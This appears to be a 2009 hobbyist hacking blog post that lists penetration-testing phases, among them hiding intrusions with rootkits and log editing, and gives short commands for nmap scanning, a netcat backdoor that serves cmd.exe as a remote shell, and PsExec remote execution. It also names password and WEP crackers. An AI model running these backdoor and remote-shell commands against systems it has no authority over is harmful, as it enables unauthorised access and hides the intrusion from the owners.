tags

alert (1) art (1) asteriks (1) bof (1) browser (1) buffer overflow (1) computer (1) connect (1) cookie (1) crack (2) db_connect (1) db_driver (1) db_load (1) ddos (1) debugging (1) defaced (4) Deprecated plugin (1) document (1) dos (1) errors (1) expl (2) exploit (2) game over (1) geek (1) geeky (1) generd (1) gov.my (1) GSM (1) hack (2) hacker (1) hacking (1) hacks (2) hitb (1) hobbyist (1) ihack (1) index (1) inject (1) injection (1) java (1) javascript (1) lfi (2) malaysia (1) meta (1) metasploit (1) microwave (1) mysql (1) nerd (1) nerdy (1) netstat (1) nmap (1) outbout (1) owned (1) packet (2) pass (1) password (1) pdos (1) psexec (1) pub (1) pwn (1) retrive (1) reveal (1) reverse (1) reverse shell (1) rfi (2) root (1) sarawak (1) security (1) SEH (2) session (1) shellcode (1) sibu (1) sniffing (1) sql (1) sqli (1) stack overflow (1) turk (1) user (1) vnc (1) web (1) which one (1) wideband (1) you (1)

5pl017

Inj3ct0r.com

http://sec.jetlib.com/

Defacement-art-Underground-propaganda

Wireless hack,Wifi hack & security

Tuesday, December 22, 2009

Oldschool but still useable...

Preparation to pentesting.
  1. Footprinting - Determining the targets footprint, e.g. DNS records, IP scope, public information, contact information, etc.
  2. Scanning - Determining the targets openings, e.g. service ports, wireless networks, modems pools, vpn servers, etc.
  3. Enumeration - Determining the services behind the openings, e.g. webservers, systems, routers, firewalls, wifi authentication, etc.
  4. Penetration - Selecting appropiate exploits and penetrate the target, e.g. SQL injection, buffer overflow, password attacks, etc.
  5. Escalation - Escalation of the credentials to admin or root, e.g. dll injection, local exploit, configuration change, sceduled jobs, etc.
  6. Getting Interactive - Getting a remote shell or GUI on the target, e.g. RDP, VNC, NetCat, etc.
  7. Expanding Influence - Moving from the initial target as a foothold or beach-head to the rest of the network taking over the domain.
  8. Cleaning Up - Ensuring backdoors and removing evidence, e.g. rootkits, log removal, log editing, etc.
  9. Reporting - Writing and presenting a report on the pen-test to the owners of the network one had authoritation to test.
more infos, read these
Basic tools and examples

Portscanner
Nmap -sS -vv -P0 -n -p 21,80,443 // probing for open port


Backdoor
Nc.exe -l -p 80 // execute a backdoor and listen to port 80 for outbound connection
Nc.exe -v -e cmd.exe <the backdoored ip address > 80 // connect to backdoor

PSexec tools useful for remote access
PSexec \\ -u administrator -p password -s cmd.exe

VNC same as PSexec, it's stress on GUI

A password cracker tools

Brutus Password cracker
THC password cracker
AircrackNG WIFI - WEP cracker


0 Comments:


 

fizpentest, mfCc 2007-2011

IMPORTANT: This information is for research and academic purposes only! This info is not to be abused! I am not responsible for any damage that you may create!